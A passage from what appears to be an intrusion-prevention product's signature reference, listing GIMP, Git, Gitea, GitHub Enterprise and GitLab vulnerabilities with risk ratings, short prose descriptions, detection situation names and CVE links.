Situation: HTTP_CS-Gila-CMS-Media-assets.php-Path-Traversal
References:
CVE-2020-5512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5512
Back to top

GIMP-Psp-Image-Color-Palette-Block-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in GIMP
Risk: High
First detected in: sgpkg-ips-1684-5242
Last changed: sgpkg-ips-1684-5242
Platform: Generic
Software: GIMP
Type: Integer Overflow
Description: A code execution vulnerability has been reported in GNU Image Manipulation Program (GIMP). The vulnerability is due to improper handling of PSP files. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious image. Successful exploitation could result in arbitrary code execution under the context of the user.
Situation: File-Binary_GIMP-Psp-Image-Color-Palette-Block-Parsing-Integer-Overflow
References:
CVE-2023-44443
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44443
Back to top

GIMP-script-fu-Server-Buffer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in the readstr_upto function in GIMP script-fu detected
Risk: High
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: GIMP
Type: Buffer Overflow
Description: A buffer overflow vulnerability in the readstr_upto function in GIMP script-fu, versions 2.6.12 and before and possibly 2.6.13, which allows remote attackers to execute arbitrary code via a long string in a command to the script-fu server.
Situation: Generic_CS-GIMP-script-fu-Server-Buffer-Overflow
References:
CVE-2012-2763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2763
BID-53741
http://www.securityfocus.com/bid/53741
OSVDB-82429
http://www.osvdb.org/82429
Back to top

GIMP-XWD-File-Handling-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in GNU GIMP
Risk: Moderate
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GIMP
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability leading to code execution has been reported in GNU Image Manipulation Program (GIMP). The vulnerability is due to insufficient validation of certain fields while parsing XWD files. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious XWD file. Successful exploitation could result in injection and execution of arbitrary code, within the security context of the current logged in user. The behaviour of the target would depend on the intention of the malicious code. If code injection is not successful, the affected application will terminate abnormally.
Situation: File-Binary_GIMP-XWD-File-Handling-Heap-Buffer-Overflow
References:
CVE-2013-1978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1978
Back to top

GIMP-XWD-File-Handling-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in GNU GIMP
Risk: Moderate
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GIMP
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability exists in GNU Image Manipulation Program (GIMP). The vulnerability is due to insufficient validation of certain fields while parsing XWD files. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious XWD file. Successful exploitation could result in injection and execution of arbitrary code, within the security context of the current logged in user. The behaviour of the target would depend on the intention of the malicious code. If code injection is not successful, the affected application will terminate abnormally.
Situation: File-Binary_GIMP-XWD-File-Handling-Stack-Buffer-Overflow
References:
CVE-2012-5576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5576
BID-56647
http://www.securityfocus.com/bid/56647
OSVDB-87792
http://www.osvdb.org/87792
Back to top

Git-Client-Path-Validation-Command-Execution

About this vulnerability: A vulnerability in GIT GIT
Risk: Low
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Git
Type: Input Validation
Description: A command execution vulnerability exists in the Git client. The vulnerability is due to insufficient validation of allowed check-in paths. A malicious attacker can overwrite the contents of the '.git/' directory when the repository is cloned from an operating system with a case insensitive file system. Contents of '.git/' can be used to execute arbitrary commands on the system. A remote attacker could exploit this vulnerability by enticing a user to checkout a crafted git repository, or by checking-in maliciously crafted commits to a vulnerable host. Successful exploitation could result in command execution in the context of the currently logged in user.
Situation: File-Binary_Git-Client-Path-Validation-Command-Execution
References:
CVE-2014-9390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9390
OSVDB-116041
http://www.osvdb.org/116041
Back to top

Git-Git-Source-Code-Management-gitattributes-Integer-Overflow

About this vulnerability: A vulnerability in Git Source Code Management.
Risk: High
First detected in: sgpkg-ips-1575-5242
Last changed: sgpkg-ips-1575-5242
Platform: Generic
Software: Git
Type: Integer Overflow
Description: A vulnerability in Git Source Code Management, multiple versions, which allows remote attackers to execute arbitrary code by enticing a user to clone a malicious repository, due to improper handling of gitattributes files with a large number of attributes defined.
Situation: HTTP_CS-Git-Git-Source-Code-Management-gitattributes-Integer-Overflow
Generic_CS-Git-Git-Source-Code-Management-gitattributes-Integer-Overflow
References:
CVE-2022-23521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23521
Back to top

Git-Remote-Code-Execution-Via-Git-lfs-CVE-2020-27955

About this vulnerability: A vulnerability in Git LFS.
Risk: High
First detected in: sgpkg-ips-1398-5242
Last changed: sgpkg-ips-1398-5242
Platform: Windows
Software: Git LFS
Type: Malfunction
Description: A vulnerability in Git LFS, versions 2.12 and before, which allows remote attackers to execute arbitary code by enticing a victim to clone a malicious repository.
Situation: File-Binary_DGit-Remote-Code-Execution-Via-Git-lfs-CVE-2020-27955
References:
CVE-2020-27955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27955
Back to top

Git-Source-Code-Management-Apply-Reject-Arbitrary-File-Write

About this vulnerability: A vulnerability in Git
Risk: Moderate
First detected in: sgpkg-ips-1604-5242
Last changed: sgpkg-ips-1604-5242
Platform: Generic
Software: Git
Type: Malfunction
Description: An arbitrary file overwrite vulnerability has been reported in Git. The vulnerability is due to a design weakness when git apply is run with the --reject option. A remote attacker could exploit this vulnerability by enticing a target user to apply a malicious patch using the --reject option. Successful exploitation could result in arbitrary file overwrite in the target user's system.
Situation: File-Text_Git-Source-Code-Management-Apply-Reject-Arbitrary-File-Write
References:
CVE-2023-25652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25652
Back to top

Git-Source-Code-Management-Clone_submodule-Link-Following

About this vulnerability: A vulnerability in Git
Risk: High
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1784-5242
Platform: Generic
Software: Git
Type: Input Validation
Description: A link following vulnerability has been reported for Git Source Code Management. This vulnerability is due to improper handling of symlinks when recursively cloning a git repository containing submodules. A remote attacker could exploit this vulnerability by enticing a user to clone a malicious repository. Successfully exploiting this vulnerability could result in remote code execution in the security context of the git process.
Situation: Generic_SS-Suspicious-Git-Packfile-In-Server-Response
References:
CVE-2024-32002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32002
Back to top

Git-Source-Code-Management-Improper-Link-Resolution

About this vulnerability: A vulnerability in Git Source Code Management.
Risk: High
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Platform: Generic
Software: Git
Type: Malfunction
Description: A vulnerability in Git Source Code Management, versions 2.14.2 and after prior to 2.30.2, which allows remote attackers to execute arbitrary code by enticing a user to clone a malicious repository, due to improper validation of file system resource type prior to performing a file write operation.
Situation: File-Binary_Git-Source-Code-Management-Improper-Link-Resolution
References:
CVE-2021-21300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21300
Back to top

Git-SSH-Url-Processing-Command-Execution

About this vulnerability: A vulnerability in GIT GIT
Risk: Moderate
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Git
Type: Input Validation
Description: There exists a command execution vulnerability in the Git client. A successful exploitation could lead to arbitrary code execution on the target system.
Situation: File-Binary_Git-SSH-Url-Processing-Command-Execution
References:
CVE-2017-1000117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000117
Back to top

Git-Submodules-Directory-Traversal

About this vulnerability: A vulnerability in GIT
Risk: High
First detected in: sgpkg-ips-1136-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Git
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in the Git client. The vulnerability is due to insufficient validation of submodule names in the .gitmodules file during checkout. A malicious attacker could exploit this vulnerability by convincing a user to checkout a specially crafted git repository. Successful exploitation will enable the attacker to execute arbitrary scripts on the target system.
Situation: Generic_SS-Git-Submodules-Directory-Traversal
File-Binary_Git-Submodules-Directory-Traversal
References:
CVE-2018-11235
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11235
Back to top

Gitea-Git-Hooks-Remote-Code-Execution

About this vulnerability: A vulnerability in Gitea.
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Unix; Linux; Windows
Software: Gitea
Type: Input Validation
Description: A vulnerability in Gitea, version 1.13.0, which allows remote attackers to execute arbitrary code by setting a post-receive git hook with a payload.
Situation: HTTP_CRL-Gitea-And-Gogs-Git-Hooks-Remote-Code-Execution
References:
CVE-2020-14144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14144
Back to top

GitHub-Enterprise-Default-Session-Secret-And-Deserialization-Vulnerability

About this vulnerability: A Github Enterprise Default Session Secret And Deserialization vulnerability
Risk: High
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux; Mac OS X
Software: Github
Type: Input Validation
Description: A vulnerability in Github Enterprise, versions 2.8.0 - 2.8.6, which allows remote attackers to retrieve a hard-coded secret value and sign malicious ruby objects.
Situation: HTTP_CSH-GitHub-Enterprise-Default-Session-Secret-And-Deserialization-Vulnerability
Back to top

GitHub-Enterprise-Saml-Authentication-Bypass-CVE-2024-9487

About this vulnerability: An attempt to exploit a vulnerability in GitHub detected
Risk: High
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Platform: Generic
Software: Github
Type: Input Validation
Description: An improper verification of cryptographic signature vulnerability was identified in GitHub Enterprise Server that allowed SAML SSO authentication to be bypassed, resulting in unauthorized provisioning of users and access to the instance. Exploitation required the encrypted assertions feature to be enabled, and the attacker would require direct network access as well as a signed SAML response or metadata document. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.15 and was fixed in versions 3.11.16, 3.12.10, 3.13.5, and 3.14.2.
Situation: HTTP_CRL-Saml-XML-Signature-Wrapping
References:
CVE-2024-9487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9487
Back to top

Gitlab-Abstract_reference_filter-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A cross site scripting vulnerability has been reported in GitLab Community and Enterprise Edition. This vulnerability is due to improper user input validation. A remote attacker could exploit this vulnerabilities by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-Gitlab-Abstract_reference_filter-Stored-Cross-Site-Scripting
References:
CVE-2023-6371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6371
Back to top

Gitlab-Account-Hijacking-Vulnerability-CVE-2023-7028

About this vulnerability: A vulnerability in GitLab
Risk: High
First detected in: sgpkg-ips-1675-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: GitLab
Type: Malfunction
Description: An account hijacking vulnerability has been reported in GitLab. An unauthenticated attacker can provide arbitrary email addresses for the user account password reset functionality, allowing for a complete takeover of any existing GitLab account.
Situation: HTTP_CRL-Gitlab-Account-Hijacking-Vulnerability-CVE-2023-7028
References:
CVE-2023-7028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7028
Back to top

Gitlab-Arbitrary-File-Read-Vulnerability-CVE-2023-2825

About this vulnerability: An attempt to exploit a vulnerability in GitLab detected
Risk: High
First detected in: sgpkg-ips-1593-5242
Last changed: sgpkg-ips-1593-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: This is a critical issue in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups.
Situation: HTTP_CRL-Gitlab-Arbitrary-File-Read-Vulnerability-CVE-2023-2825
References:
CVE-2023-2825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2825
Back to top

Gitlab-Arbitrary-File-Write

About this vulnerability: A vulnerability in GitLab
Risk: Moderate
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: An arbitrary file write vulnerability has been reported in GitLab. The vulnerability is due to insufficient validation of imported GitLab projects. An authenticated, remote attacker can exploit this vulnerability by importing crafted GitLab projects. Successful exploitation could result in the creation or overwriting of files writeable by the user running GitLab, leading to the possibility of arbitrary code execution.
Situation: File-Binary_Gitlab-Arbitrary-File-Write
References:
CVE-2018-14364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14364
Back to top

Gitlab-Branch-Name-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: Improper input validation of the default branch name in some types of requests causes a cross-site scripting vulnerability in GitLab. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Gitlab-Branch-Name-Stored-Cross-Site-Scripting
References:
CVE-2021-22241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22241
Back to top

Gitlab-Branch-Search-Regex-Denial-Of-Service-CVE-2024-2878

About this vulnerability: A vulnerability in GitLab
Risk: High
First detected in: sgpkg-ips-1751-5242
Last changed: sgpkg-ips-1751-5242
Platform: Generic
Software: GitLab
Type: Resource Starvation
Description: A regular expression denial of service (ReDoS) vulnerability has been reported in GitLab Community and Enterprise Edition. The vulnerability is due to a design weakness in a regular expression that processes Branch Search search strings. An unauthenticated, remote attacker could exploit this vulnerability by submitting a malicious project file search request to the target server. Successfully exploiting this vulnerability could result in a denial of service condition for the target system.
Situation: HTTP_CSU-Gitlab-Branch-Search-Regex-Denial-Of-Service-CVE-2024-2878
References:
CVE-2024-2878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2878
Back to top

Gitlab-Community-And-Enterprise-Edition-Autolinkfilter-Regex-Denial-Of-Service

About this vulnerability: A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: High
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: GitLab
Type: Malfunction
Description: A regular expression denial of service (ReDoS) vulnerability has been reported in GitLab Community and Enterprise Edition. The vulnerability is due to a design weakness in a regular expression that processes markdown URL strings. An unauthenticated, remote attacker could exploit this vulnerability by submitting or previewing malicious markdown text on the target server. Successfully exploiting this vulnerability could result in denial of service of the target system.
Situation: File-Text_Gitlab-Community-And-Enterprise-Edition-Autolinkfilter-Regex-Denial-Of-Service
References:
CVE-2023-3364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3364
Back to top

Gitlab-Community-And-Enterprise-Edition-CVE-2023-0921-Denial-Of-Service

About this vulnerability: A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1623-5242
Last changed: sgpkg-ips-1623-5242
Platform: Generic
Software: GitLab
Type: Resource Starvation
Description: A denial-of-service vulnerability has been reported in GitLab Community and Enterprise Editions. The vulnerability is due to improper validation of large label description that could saturate CPU usage. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests repeatedly to the target server. Successful exploitation could result in denial-of-service condition on the target server.
Situation: HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-CVE-2023-0921-Denial-Of-Service
References:
CVE-2023-0921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0921
Back to top

Gitlab-Community-And-Enterprise-Edition-dompurify.js-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in GitLab.
Risk: High
First detected in: sgpkg-ips-1424-5242
Last changed: sgpkg-ips-1424-5242
Platform: Generic
Software: GitLab
Type: Cross-site Scripting
Description: A vulnerability in GitLab Community and Enterprise editions, versions 14.2.x prior to 14.2.6, 14.3.x prior to 14.3.4, and 14.4.x prior to 14.4.1, which allows remote attackers to execute arbitrary scripts in the targets browser, du to insufficient input sanitization of ipynb files.
Situation: HTTP_CS-Gitlab-Community-And-Enterprise-Edition-dompurify.js-Stored-Cross-Site-Scripting
References:
CVE-2021-39906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39906
Back to top

Gitlab-Community-And-Enterprise-Edition-Filefinder-Regex-Denial-Of-Service

About this vulnerability: A vulnerability in GitLab
Risk: Moderate
First detected in: sgpkg-ips-1744-5242
Last changed: sgpkg-ips-1744-5242
Platform: Generic
Software: GitLab
Type: Resource Starvation
Description: A design weakness in a regular expression that processes FileFinder search strings causes a denial of service vulnerability in Gitlab. A successful exploitation allows an attacker to cause a denial of service condition on the target system.
Situation: HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Filefinder-Regex-Denial-Of-Service
References:
CVE-2024-2829
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2829
Back to top

Gitlab-Community-And-Enterprise-Edition-GitHub-Import-Remote-Code-Execution

About this vulnerability: A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: High
First detected in: sgpkg-ips-1538-5242
Last changed: sgpkg-ips-1541-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A remote code execution vulnerability has been reported for GitLab GitHub imports. The vulnerability is due to due to improper handling of the data returned while running the import. A remote, authenticated attacker can exploit this vulnerability by initiating a GitHub import on a target server to an attacker controlled GitHub server. Successful exploitation could result in the execution of arbitrary commands in the security context of the Redis service on the target server. This situation also detects CVE-2022-2992.
Situation: File-Text_Gitlab-Community-And-Enterprise-Edition-GitHub-Import-Remote-Code-Execution
References:
CVE-2022-2884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2884
Back to top

Gitlab-Community-And-Enterprise-Edition-Glm_Source-Denial-Of-Service

About this vulnerability: A vulnerability in GitLab
Risk: Moderate
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1781-5242
Platform: Generic
Software: GitLab
Type: Resource Starvation
Description: A design weakness in the regular expression that processes glm_source causes a vulnerability in GitLab. A successful exploitation allows an attacker to cause a denial of service condition on the target system.
Situation: HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Glm_Source-Denial-Of-Service
References:
CVE-2024-8124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8124
Back to top

Gitlab-Community-And-Enterprise-Edition-Kroki-Diagram-Stored-XSS

About this vulnerability: A vulnerability in GitLab, GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1586-5242
Last changed: sgpkg-ips-1586-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A cross site scripting vulnerability has been reported in GitLab Community and Enterprise Editions. The vulnerability is due to improper validation of user input of kroki diagrams. A remote, authenticated attacker could exploit these vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in arbitrary script execution under the security context of the target user's browser.
Situation: HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Kroki-Diagram-Stored-XSS
References:
CVE-2023-0050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0050
Back to top

Gitlab-Community-And-Enterprise-Edition-Label-Color-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: High
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in the Community Edition and Enterprise Edition of GitLab. The vulnerability is due to improper input validation of label colors. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation could result in the execution of script code in the security context of a target user's browser.
Situation: File-Text_Gitlab-Community-And-Enterprise-Edition-Label-Color-Stored-Cross-Site-Scripting
References:
CVE-2022-3265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3265
Back to top

Gitlab-Community-And-Enterprise-Edition-Markdown-Render-Denial-Of-Service

About this vulnerability: A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1758-5242
Last changed: sgpkg-ips-1758-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A denial of service vulnerability has been reported in GitLab Community and Enterprise Edition. This vulnerability is due to improper input validation when handling markdown rendering. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.
Situation: HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Markdown-Render-Denial-Of-Service
References:
CVE-2024-2651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2651
Back to top

Gitlab-Community-And-Enterprise-Edition-Merge-Requests-Stored-XSS

About this vulnerability: A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: Improper escaping of branch names when displaying the branch name in merge requests causes a cross-site scripting vulnerability in GitLab. A successful exploit allows an attacker to run arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Merge-Requests-Stored-XSS
References:
CVE-2023-2442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2442
Back to top

Gitlab-Community-And-Enterprise-Edition-Milestone-References-Stored-XSS

About this vulnerability: A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1483-5242
Last changed: sgpkg-ips-1483-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in GitLab Community and Enterprise Editions. The vulnerability is due to improper sanitization of user input submitted in milestone references. A remote, authenticated attacker can exploit this vulnerability by by sending a crafted request to the target server. Successful exploitation could result in arbitrary script execution in the security context of the target user's browser.
Situation: HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Milestone-References-Stored-XSS
References:
CVE-2022-1190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1190
Back to top

Gitlab-Community-And-Enterprise-Edition-Notes-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: High
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in GitLab Community and Enterprise Editions. The vulnerability is due to improper sanitization of user input submitted in notes. A remote, authenticated attacker can exploit this vulnerability by by sending a crafted request to the target server. Successful exploitation could result in arbitrary script execution in the security context of the target user's browser.
Situation: HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Notes-Stored-Cross-Site-Scripting
References:
CVE-2022-1175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175
Back to top

Gitlab-Community-And-Enterprise-Edition-Pin-Menu-Denial-Of-Service

About this vulnerability: A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1758-5242
Last changed: sgpkg-ips-1758-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A denial of service vulnerability has been reported in GitLab Community and Enterprise Edition. This vulnerability is due to improper input validation when handling the user pin menu.
Situation: File-Text_Gitlab-Community-And-Enterprise-Edition-Pin-Menu-Denial-Of-Service
References:
CVE-2024-2454
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2454
Back to top

Gitlab-Community-And-Enterprise-Edition-Profile-Page-Stored-XSS

About this vulnerability: A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: Improper validation of user input causes a cross-site scripting vulnerability in GitLab. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Profile-Page-Stored-XSS
References:
CVE-2024-1451
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1451
Back to top

Gitlab-Community-And-Enterprise-Edition-Runner-Description-Denial-Of-Service

About this vulnerability: A vulnerability in GitLab
Risk: Moderate
First detected in: sgpkg-ips-1768-5242
Last changed: sgpkg-ips-1768-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A denial of service vulnerability has been reported in GitLab Community and Enterprise Edition. This vulnerability is due to improper input validation when handling runner descriptions. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.
Situation: File-Text_Gitlab-Community-And-Enterprise-Edition-Runner-Description-Denial-Of-Service
References:
CVE-2024-2874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2874
Back to top

Gitlab-Community-And-Enterprise-Edition-Saml-Authentication-Bypass

About this vulnerability: A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: Moderate
First detected in: sgpkg-ips-1796-5242
Last changed: sgpkg-ips-1796-5242
Platform: Generic
Software: GitLab
Type: Malfunction
Description: Improper SAML authentication verification causes an authentication bypass vulnerability in GitLab. A successful exploitation allows an attacker to elevate their privileges an access restricted information.
Situation: HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Saml-Authentication-Bypass
References:
CVE-2024-45409
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45409
Back to top

Gitlab-Community-And-Enterprise-Edition-Web-IDE-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: High
First detected in: sgpkg-ips-1637-5242
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: GitLab
Type: Malfunction
Description: A stored cross-site scripting vulnerability has been reported in GitLab Community and Enterprise Edition. The vulnerability is due to a design weakness in the vscode-mediator-commands package. A remote attacker could exploit this vulnerability by submitting malicious markdown text on the target server that is then interacted with in the Web IDE. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Web-IDE-Stored-Cross-Site-Scripting
References:
CVE-2023-2164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2164
Back to top

Gitlab-Deprecated_notes.js-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in GitLab
Risk: High
First detected in: sgpkg-ips-1782-5242
Last changed: sgpkg-ips-1782-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in GitLab Community and Enterprise Edition. The vulnerability is due to insufficient input validation when importing GitLab projects. A remote, authenticated attacker could exploit this vulnerability by importing a crafted project export. Successfully exploiting this vulnerability could result in code execution in the context of the victim's browser.
Situation: HTTP_CS-Gitlab-Deprecated_notes.js-Stored-Cross-Site-Scripting
References:
CVE-2024-4901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4901
Back to top

Gitlab-Designreferencefilter-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)
Risk: High
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in the Community edition and Enterprise edition of GitLab. The vulnerability is due to insufficient input sanitization of design links included in markup code. A remote, authenticated attacker can exploit these vulnerabilities with crafted requests to the target server. Successful exploitation could result in arbitrary script execution in the target user's browser.
Situation: HTTP_CS-Gitlab-Designreferencefilter-Stored-Cross-Site-Scripting
HTTP_CRL-Gitlab-Designreferencefilter-Stored-Cross-Site-Scripting
References:
CVE-2021-22238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22238
Back to top

Gitlab-File-Read-Remote-Code-Execution

About this vulnerability: A vulnerability in GitLab.
Risk: High
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Platform: Generic
Software: GitLab
Type: Input Validation
Description: A vulnerability in GitLab Community Edition, versions 12.4.0 and above, fixed in 12.9.1, 12.8.8, and 12.7.8, which allows remote attackers to execute arbitrary code through a deserialization of a signed experimentation_subject_id cookie.
Situation: HTTP_CS-Gitlab-File-Read-Remote-Code-Execution
References:
CVE-2020-10977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10977
Back to top

Gitlab-Gollum-Link-Regex-Denial-Of-Service

About this vulnerability: A vulnerability in GitLab
Risk: Moderate
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Platform: Generic
Software: GitLab
Type: Resource Starvation
Description: A design weakness in a regular expression that processes gollum link search strings causes a denial of service vulnerability in Gitlab. A successful exploitation allows an attacker to cause a denial of service condition on the target system.
Situation: HTTP_CRL-Gitlab-Gollum-Link-Regex-Denial-Of-Service
References:
CVE-2023-6502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6502
Back to top

Gitlab-Graphql-API-User-Enumeration

About this vulnerability: A vulnerability in GitLab.
Risk: High
First detected in: sgpkg-ips-1446-5242
